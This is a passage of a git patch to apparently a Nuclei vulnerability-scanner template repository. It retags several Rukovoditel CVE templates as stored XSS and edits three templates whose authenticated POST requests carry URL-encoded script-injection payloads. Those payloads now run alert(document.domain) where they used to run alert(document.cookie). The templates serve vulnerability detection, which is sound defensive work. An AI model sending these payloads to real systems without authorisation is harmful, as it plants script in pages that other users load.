3e45934dcf..3487ba0aea 100644 --- a/http/cves/2022/CVE-2022-43170.yaml +++ b/http/cves/2022/CVE-2022-43170.yaml @@ -17,7 +17,7 @@ info: cwe-id: CWE-79 metadata: verified: true - tags: cve,cve2022,rukovoditel,xss,authenticated + tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated http: - raw: diff --git a/http/cves/2022/CVE-2022-43185.yaml b/http/cves/2022/CVE-2022-43185.yaml index 83416143de..7c5d638e81 100644 --- a/http/cves/2022/CVE-2022-43185.yaml +++ b/http/cves/2022/CVE-2022-43185.yaml @@ -17,7 +17,7 @@ info: cwe-id: CWE-79 metadata: verified: true - tags: cve,cve2022,rukovoditel,xss,authenticated + tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated http: - raw: - | diff --git a/http/cves/2022/CVE-2022-44944.yaml b/http/cves/2022/CVE-2022-44944.yaml index 5802278e39..cdde910d64 100644 --- a/http/cves/2022/CVE-2022-44944.yaml +++ b/http/cves/2022/CVE-2022-44944.yaml @@ -18,7 +18,7 @@ info: metadata: verified: true shodan-query: http.favicon.hash:-1499940355 - tags: cve,cve2022,rukovoditel,xss,authenticated + tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated http: - raw: diff --git a/http/cves/2022/CVE-2022-44946.yaml b/http/cves/2022/CVE-2022-44946.yaml index 0801892bf4..20e40fab41 100644 --- a/http/cves/2022/CVE-2022-44946.yaml +++ b/http/cves/2022/CVE-2022-44946.yaml @@ -18,7 +18,7 @@ info: metadata: verified: true shodan-query: http.favicon.hash:-1499940355 - tags: cve,cve2022,rukovoditel,xss,authenticated + tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated http: - raw: diff --git a/http/cves/2022/CVE-2022-44949.yaml b/http/cves/2022/CVE-2022-44949.yaml index 2cb5e694f9..e489ae03bd 100644 --- a/http/cves/2022/CVE-2022-44949.yaml +++ b/http/cves/2022/CVE-2022-44949.yaml @@ -17,7 +17,7 @@ info: cwe-id: CWE-79 metadata: verified: true - tags: cve,cve2022,rukovoditel,xss,authenticated + tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated http: - raw: diff --git a/http/cves/2022/CVE-2022-44950.yaml b/http/cves/2022/CVE-2022-44950.yaml index b0857fad91..4688775a8f 100644 --- a/http/cves/2022/CVE-2022-44950.yaml +++ b/http/cves/2022/CVE-2022-44950.yaml @@ -17,7 +17,7 @@ info: cwe-id: CWE-79 metadata: verified: true - tags: cve,cve2022,rukovoditel,xss,authenticated + tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated http: - raw: diff --git a/http/cves/2022/CVE-2022-44952.yaml b/http/cves/2022/CVE-2022-44952.yaml index 868fa826c6..581ba7e576 100644 --- a/http/cves/2022/CVE-2022-44952.yaml +++ b/http/cves/2022/CVE-2022-44952.yaml @@ -17,7 +17,7 @@ info: cwe-id: CWE-79 metadata: verified: true - tags: cve,cve2022,rukovoditel,xss,authenticated + tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated http: - raw: From c77309373bbb89a1d1b40ed0fb5a03132edab1ed Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 7 Jul 2023 16:21:07 +0530 Subject: [PATCH 7/7] fix payload and directory --- http/cves/2020/CVE-2020-35987.yaml | 4 ++-- {cves => http/cves}/2022/CVE-2022-4295.yaml | 0 http/cves/2022/CVE-2022-43169.yaml | 4 ++-- http/cves/2022/CVE-2022-44948.yaml | 4 ++-- {cves => http/cves}/2023/CVE-2023-36346.yaml | 0 5 files changed, 6 insertions(+), 6 deletions(-) rename {cves => http/cves}/2022/CVE-2022-4295.yaml (100%) rename {cves => http/cves}/2023/CVE-2023-36346.yaml (100%) diff --git a/http/cves/2020/CVE-2020-35987.yaml b/http/cves/2020/CVE-2020-35987.yaml index 14e50a21e4..7f9018f435 100644 --- a/http/cves/2020/CVE-2020-35987.yaml +++ b/http/cves/2020/CVE-2020-35987.yaml @@ -37,7 +37,7 @@ http: Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&sort_order=0¬es=test + form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0¬es=test cookie-reuse: true redirects: true @@ -46,7 +46,7 @@ http: dsl: - 'status_code_3 == 200' - 'contains(content_type_3, "text/html")' - - 'contains(body_3, "")' + - 'contains(body_3, "")' - 'contains(body_3, "rukovoditel")' condition: and diff --git a/cves/2022/CVE-2022-4295.yaml b/http/cves/2022/CVE-2022-4295.yaml similarity index 100% rename from cves/2022/CVE-2022-4295.yaml rename to http/cves/2022/CVE-2022-4295.yaml diff --git a/http/cves/2022/CVE-2022-43169.yaml b/http/cves/2022/CVE-2022-43169.yaml index b45ddcd568..bbf75cb37a 100644 --- a/http/cves/2022/CVE-2022-43169.yaml +++ b/http/cves/2022/CVE-2022-43169.yaml @@ -36,7 +36,7 @@ http: Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&sort_order=¬es=&ldap_filter= + form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=¬es=&ldap_filter= cookie-reuse: true redirects: true @@ -46,7 +46,7 @@ http: dsl: - 'status_code_3 == 200' - 'contains(content_type_3, "text/html")' - - 'contains(body_3, "")' + - 'contains(body_3, "")' - 'contains(body_3, "rukovoditel")' condition: and diff --git a/http/cves/2022/CVE-2022-44948.yaml b/http/cves/2022/CVE-2022-44948.yaml index 90fe854aef..a57e89e948 100644 --- a/http/cves/2022/CVE-2022-44948.yaml +++ b/http/cves/2022/CVE-2022-44948.yaml @@ -36,7 +36,7 @@ http: Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&sort_order=0 + form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0 cookie-reuse: true redirects: true @@ -46,7 +46,7 @@ http: dsl: - 'status_code_3 == 200' - 'contains(content_type_3, "text/html")' - - 'contains(body_3, "")' + - 'contains(body_3, "")' - 'contains(body_3, "rukovoditel")' condition: and diff --git a/cves/2023/CVE-2023-36346.yaml b/http/cves/2023/CVE-2023-36346.yaml similarity index 100% rename from cves/2023/CVE-2023-36346.yaml rename to http/cves/2023/CVE-2023-36346.yaml